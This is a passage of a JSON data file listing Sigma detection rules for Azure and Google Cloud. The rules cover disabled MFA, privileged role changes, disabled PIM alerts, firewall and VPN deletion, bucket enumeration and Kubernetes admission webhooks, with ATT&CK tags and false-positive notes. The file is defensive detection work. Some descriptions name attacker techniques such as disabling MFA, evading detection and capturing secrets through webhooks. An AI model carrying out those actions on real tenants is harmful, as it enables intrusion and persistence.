"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/10/10", - "filename": "azure_login_to_disabled_account.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", - "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", - "value": "Multifactor Authentication Denied", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ], - "creation_date": "2022/03/24", - "filename": "azure_mfa_denies.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Users actually login but miss-click into the Deny button when MFA prompt." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", - "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", - "value": "Disabled MFA to Bypass Authentication Mechanisms", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1556/", - "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1556" - ], - "creation_date": "2022/02/08", - "filename": "azure_mfa_disabled.yml", - "author": "@ionsor", - "level": "medium", - "falsepositive": [ - "Authorized modification by administrators" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", - "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", - "value": "Multifactor Authentication Interrupted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ], - "creation_date": "2021/10/10", - "filename": "azure_mfa_interrupted.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Firewall Policy is Modified or Deleted.", - "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", - "value": "Azure Network Firewall Policy Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/02", - "filename": "azure_network_firewall_policy_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", - "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", - "value": "Azure Firewall Rule Configuration Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_firewall_rule_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", - "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", - "value": "Azure Point-to-site VPN Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a network security configuration is modified or deleted.", - "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", - "value": "Azure Network Security Configuration Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_security_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", - "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", - "value": "Azure Virtual Network Device Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_network_virtual_device_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a new cloudshell is created inside of Azure portal.", - "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", - "value": "Azure New CloudShell Created", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2021/09/21", - "filename": "azure_new_cloudshell_created.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "A new cloudshell may be created by a system administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a owner is was removed from a application or service principal in Azure.", - "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", - "value": "Azure Owner Removed From Application or Service Principal", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/03", - "filename": "azure_owner_removed_from_application_or_service_principal.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Owner being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", - "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", - "value": "PIM Approvals And Deny Elevation", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2022/08/09", - "filename": "azure_pim_activation_approve_deny.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Actual admin using PIM." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when PIM alerts are set to disabled.", - "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", - "value": "PIM Alert Setting Changes To Disabled", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1484" - ], - "creation_date": "2022/08/09", - "filename": "azure_pim_alerts_disabled.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Administrator disabling PIM alerts as an active choice." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when changes are made to PIM roles", - "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", - "value": "Changes To PIM Settings", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/09", - "filename": "azure_pim_change_settings.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Legit administrative PIM setting configuration changes" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user is added to a privileged role.", - "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", - "value": "User Added To Privilege Role", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/06", - "filename": "azure_priviledged_role_assignment_add.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Legtimate administrator actions of adding members from a role" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", - "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", - "value": "Bulk Deletion Changes To Privileged Account Permissions", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/05", - "filename": "azure_priviledged_role_assignment_bulk_change.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Legtimate administrator actions of removing members from a role" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a new admin is created.", - "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", - "value": "Privileged Account Creation", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_privileged_account_creation.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", - "level": "medium", - "falsepositive": [ - "A legitimate new admin account being created" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", - "value": "Rare Subscription-level Operations In Azure", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" - ], - "tags": [ - "attack.t1003" - ], - "creation_date": "2020/05/07", - "filename": "azure_rare_operations.yml", - "author": "sawwinnnaung", - "level": "medium", - "falsepositive": [ - "Valid change" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a service principal is created in Azure.", - "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", - "value": "Azure Service Principal Created", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/02", - "filename": "azure_service_principal_created.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service principal being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a service principal was removed in Azure.", - "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", - "value": "Azure Service Principal Removed", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/03", - "filename": "azure_service_principal_removed.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service principal being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", - "value": "Azure Subscription Permission Elevation Via ActivityLogs", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/11/26", - "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", - "author": "Austin Songer @austinsonger", - "level": "high", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", - "value": "Azure Subscription Permission Elevation Via AuditLogs", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/11/26", - "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", - "author": "Austin Songer @austinsonger", - "level": "high", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", - "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", - "value": "Azure Suppression Rule Created", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "azure_suppression_rule_created.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Suppression Rule being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", - "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", - "value": "Temporary Access Pass Added To An Account", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/10", - "filename": "azure_tap_added.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Administrator adding a legitmate temporary access pass" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when there is a interruption in the authentication process.", - "uuid": "8366030e-7216-476b-9927-271d79f13cf3", - "value": "Azure Unusual Authentication Interruption", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/11/26", - "filename": "azure_unusual_authentication_interruption.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", - "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", - "value": "Users Authenticating To Other Azure AD Tenants", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/06/30", - "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights\u2248 of unauthorizeed login to valid accounts.\n", - "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", - "value": "User Access Blocked by Azure Conditional Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2021/10/10", - "filename": "azure_user_login_blocked_by_conditional_access.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when a user has reset their password in Azure AD", - "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", - "value": "Password Reset By User Account", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/08/03", - "filename": "azure_user_password_change.yml", - "author": "YochanaHenderson, '@Yochana-H'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator or confirmed user action." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Virtual Network is modified or deleted in Azure.", - "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", - "value": "Azure Virtual Network Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_virtual_network_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a VPN connection is modified or deleted.", - "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", - "value": "Azure VPN Connection Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_vpn_connection_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when storage bucket is enumerated in Google Cloud.", - "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", - "value": "Google Cloud Storage Buckets Enumeration", - "meta": { - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" - ], - "tags": [ - "attack.discovery" - ], - "creation_date": "2021/08/14", - "filename": "gcp_bucket_enumeration.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects when storage bucket is modified or deleted in Google Cloud.", - "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", - "value": "Google Cloud Storage Buckets Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/14", - "filename": "gcp_bucket_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when sensitive information is re-identified in google Cloud.", - "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", - "value": "Google Cloud Re-identifies Sensitive Information", - "meta": { - "refs": [ - "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565" - ], - "creation_date": "2021/08/15", - "filename": "gcp_dlp_re_identifies_sensitive_information.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", - "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", - "value": "Google Cloud DNS Zone Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/dns/docs/reference/v1/managedZones", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/15", - "filename": "gcp_dns_zone_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", - "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", - "value": "Google Cloud Firewall Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2021/08/13", - "filename": "gcp_firewall_rule_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", - "Exceptions can be added to this rule to filter expected behavior." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", - "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", - "value": "Google Full Network Traffic Packet Capture", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074" - ], - "creation_date": "2021/08/13", - "filename": "gcp_full_network_traffic_packet_capture.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Full Network Packet Capture may be done by a system or network administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", - "value": "Google Cloud Kubernetes Admission Controller", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ], - "creation_date": "2021/11/25", - "filename": "gcp_kubernetes_admission_controller.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Google Cloud Kubernetes Admission Controller may be done by 